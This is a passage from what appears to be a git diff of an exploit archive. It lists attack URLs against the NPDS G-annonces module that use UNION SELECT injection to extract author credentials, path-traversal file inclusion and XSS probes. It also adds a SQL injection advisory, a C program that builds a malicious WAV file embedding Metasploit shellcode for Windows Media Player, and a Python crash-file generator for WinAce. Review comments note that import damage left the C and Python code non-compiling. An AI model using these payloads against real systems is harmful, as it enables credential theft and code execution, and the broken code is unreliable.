+58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58))%20FROM%20authors/*&table_annonc +es=`annonces`http:/www.example.com/npds/modules/G-annonces/index.php?ModPath=../../../index.php%00&table_cat=faqcategories%20UNION%20SELECT%20CONCAT(aid,char(5 +8),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58))%20FROM%20authors/* +&table_annonces=`annonces` WHERE `date`<1/* +/npds/modules/G-annonces/index.php +SQL Inject + 
+ECT%200,0,CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,c +har(58)),0,0,0,0,0%20FROM%20authors/* +/npds/modules/G-annonces/modif_ann.php +SQL Inject + + http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?ModPath=../../../../mainfile.php%00&id_user=1&table_annonces=annonces%20UNION%20SELECT%20CONCA +T(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name +,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char( +58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58), +pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd),CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd)%20FROM%20autho +rs/* +/npds/modules/G-annonces/admin/adm_ann.php +SQL Inject & Include + + http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../../../npds/index.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[tabl +e_cat]=%20`users_status`%20(%20`posts`%20,%20`attachsig`%20,%20`rank`%20,%20`level`%20,%20`open`)%20VALUES%20(1,%200,%200,%202,%201)/* OU RECUP DE MOT DE +PASSE ROOT +http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?ModPath=../../../../mainfile.php%00&HTTP_POST_VARS[action]=ajouter&HTTP_POST_VARS[table_cat]=fa +qcategories%20UNION%20SELECT%20CONCAT(aid,char(58),name,char(58),url,char(58),email,char(58),pwd,char(58)),CONCAT(aid,char(58),name,char(58),url,char(58) +,email,char(58),pwd,char(58))%20FROM%20authors/* +/npds/modules/G-annonces/admin/adm_cat.php +SQL Inject & Include + + 
http:/www.example.com/npds/modules/G-annonces/admin/?ModPath=../../../../../../npds/index.php%00&table_cat=`test_hack_npds`%20(%20id_cat%20mediumint(11)%20NOT +%20NULL%20auto_increment,%20categorie%20int(3)%20NOT%20NULL%20default%201,%20KEY%20id%20(id_cat))/* +/npds/modules/G-annonces/admin/index.php +SQL Inject & Include + + http:/www.example.com/npds/modules/G-annonces/annonce_form.php?ModPath=../../../logs/security.log%00 +/npds/modules/G-annonces/annonce_form.php +SQL Inject & Include + + XSS non permanent +/npds/modules/annonces/affi_ann.php +XSS + + XSS non permanent +/npds/modules/annonces/affiche.php +XSS + + http:/www.example.com/npds/modules/G-annonces/admin/adm_ann.php?mess_acc=%3Cscript>alert("test");%3C/script> +/npds/modules/G-annonces/admin/adm_ann.php +XSS + + http:/www.example.com/npds/modules/G-annonces/admin/adm_cat.php?mess_acc=%3Cscript>alert("test");%3C/script> +/npds/modules/G-annonces/admin/adm_cat.php +XSS + + http:/www.example.com/npds/modules/G-annonces/annonce_form.php?mess_acc=%3Cscript>alert('test');%3C/script> +/npds/modules/G-annonces/annonce_form.php +XSS + +http:/www.example.com/npds/modules/G-annonces/index.php?mess_acc=%3Cscript>alert('test');%3C/script> +/npds/modules/G-annonces/index.php +XSS + + http:/www.example.com/npds/modules/G-annonces/list_ann.php?mess_acc=%3Cscript>alert('test');%3C/script> +/npds/modules/G-annonces/list_ann.php +XSS + + http:/www.example.com/npds/modules/G-annonces/modif_ann.php?mess_acc=%3Cscript>alert('test');%3C/script> +/npds/modules/G-annonces/modif_ann.php +XSS + + http:/www.example.com/npds/modules/G-annonces/search.php?mess_acc=%3Cscript>alert('test'); +/npds/modules/G-annonces/search.php +XSS + + http:/www.example.com/npds/modules/G-annonces/admin/index.php?mess_acc=%3Cscript>alert("test");%3C/script> +/npds/modules/GS-annonces/admin/index.php +XSS + + http:/www.example.com/npds/modules/Top10/top10.php?bgcolor2=green"> +/npds/modules/Top10/top10.php +XSS + + 
http:/www.example.com/npds/themes/npds2004/footer.php?theme="> +/npds/themes/npds2004/footer.php +XSS + diff --git a/platforms/php/webapps/32698.txt b/platforms/php/webapps/32698.txt new file mode 100755 index 000000000..5882d29ce --- /dev/null +++ b/platforms/php/webapps/32698.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/33111/info + +SolucionXpressPro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +http://www.example.com/main.php?id_area=[SQL] \ No newline at end of file diff --git a/platforms/windows/remote/32684.c b/platforms/windows/remote/32684.c new file mode 100755 index 000000000..922a17411 --- /dev/null +++ b/platforms/windows/remote/32684.c 
@@ -0,0 +1,51 @@
+source: http://www.securityfocus.com/bid/33042/info
+
+Microsoft Windows Media Player is prone to a code-execution vulnerability.
+
+An attacker can exploit this issue by tricking an unsuspecting victim into opening a malicious file with the vulnerable application. A successful exploit will allow arbitrary code to run in the context of the user running the application.
+
+#include
+
+int main()
+{
+/* win32_exec - EXITFUNC=process CMD=calc.exe Size=138 Encoder=None http://metasploit.com */
+unsigned char scode[] =
+"\xfc\xe8\x44\x00\x00\x00\x8b\x45\x3c\x8b\x7c\x05\x78\x01\xef\x8b"
+"\x4f\x18\x8b\x5f\x20\x01\xeb\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99"
+"\xac\x84\xc0\x74\x07\xc1\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x04"
+"\x75\xe5\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb"
+"\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0\x64\x8b\x40\x30"
+"\x85\xc0\x78\x0c\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x68\x08\xeb\x09"
+"\x8b\x80\xb0\x00\x00\x00\x8b\x68\x3c\x5f\x31\xf6\x60\x56\x89\xf8"
+"\x83\xc0\x7b\x50\x68\x7e\xd8\xe2\x73\x68\x98\xfe\x8a\x0e\x57\xff"
+"\xe7\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
+
+unsigned char begincode[] =
+"\x52\x49\x46\x46\x04\x44\x0E\x01\x57\x41\x56\x45\x66\x6D\x74\x20"
+"\x28\x00\x00\x00\xFE\xFF\x02\x00\x00\xEE\x02\x00\x00\x94\x11\x00"
+"\x06\x00\x18\x00\x16\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00"
+"\x00\x00\x10\x00\x80\x00\x00\xAA\x00\x38\x9B\x71\x64\x61\x74\x61"
+"\xC8\x43\x0E\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
+"\x00\x00\x00\x00\x00\x00\x00";
+
+ FILE *f;
+ f = _fsopen("new.wav", "w+", 0);
+ fwrite(begincode, sizeof(scode), 1, f);
+ for (int i=0; i<20000; i++)
+ fwrite(scode, sizeof(scode), 1, f);
+ fclose(f);
+ return 0;
+}
diff --git a/platforms/windows/remote/32688.py b/platforms/windows/remote/32688.py
new file mode 100755
index 000000000..4d8a38594
--- /dev/null
+++ b/platforms/windows/remote/32688.py
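Review bot: The `#include` directive on the first code line of this hunk carries no header name, so the file is committed in a state that cannot compile; presumably the angle-bracketed argument was stripped as markup when the advisory text was imported, the same import path that hard-wrapped the comment block of 32688.py later in this commit. Archive entries are meant to be a faithful copy of the original PoC, so either the directive should be restored from the upstream source or the entry should be flagged as stored non-compiling. A one-line marker such as `/* NOTE(archive): #include argument lost on import; see source URL above */` would at least stop readers from treating the truncated line as the author's text.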
@@ -0,0 +1,66 @@
+source: http://www.securityfocus.com/bid/33049/info
+
+Winace is prone to a denial-of-service vulnerability.
+
+Attackers can exploit this issue to crash Windows Explorer, denying service to legitimate users. Given the nature of this issue, attackers may also be able to run arbitrary code, but this has not been confirmed.
+
+Winace 2.2 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+#####################################
+# Author :
+cN4phux
+#
+# Mail : cN4phux[at]Gmail[dot]com # Proud to be Algerian; #
+# Site : N/A (not
+yet) #
+#####################################
+#Greetz to all DZ's : Blub , Knuthy , His0k4 , Djug , Izem , etc . . .
+# : Zigma , Heurs etc . . .
+
+# MS Windows Explorer Unspecified ( WinAce 2.2 ) Denial of Service Exploit
+# Magic offset :
+# Bug comes from shell32.dll
+# EventType : BEX P1 : explorer.exe P2 : 6.0.2900.2180 P3
+: 41107ece
+# P4 : shell32.dll P5 : 6.0.2900.2180 P6 : 4125330f P7 :
+000e1666
+# P8 : c0000409 P9 : 00000000
+# Just right click the file and move your mouse to( Add to
+"AAAAAAAAAAAAAAAAAAAAAAAA. . . .ace" ) with WinAce and you'll see ur
+Explorer crashes .
+# Successfully tested on Windows XP SP2 FR,
+import sys
+txt_header = ((("\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+ "\x41\x41\x41"))); #
+txt_title = "\x41"*194 #
+ext = ".txt";
+headers = open(txt_title + ext, "w")
+headers.write(txt_header)
+headers.close()
+print "\nFile created successfully !";
+print "\n\cN4phux.";
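Review bot: Several lines of the header comment block were hard-wrapped on import so that their continuations (`cN4phux`, `yet) #`, `: 41107ece`, `000e1666`, the `"AAAA...ace" ) with WinAce ...` line and `Explorer crashes .`) begin without a `#`, which makes the archived script a SyntaxError as committed rather than a copy of the author's file. The wrapping looks like mailing-list reflow of a column-padded comment box, not deliberate text, so the entry should either be re-imported from the upstream source or marked in the archive as stored non-runnable. Minor, in the code proper: `import sys` is never used, and `print "\n\cN4phux.";` contains the unrecognised escape `\c`, which Python 2 leaves in the string literally.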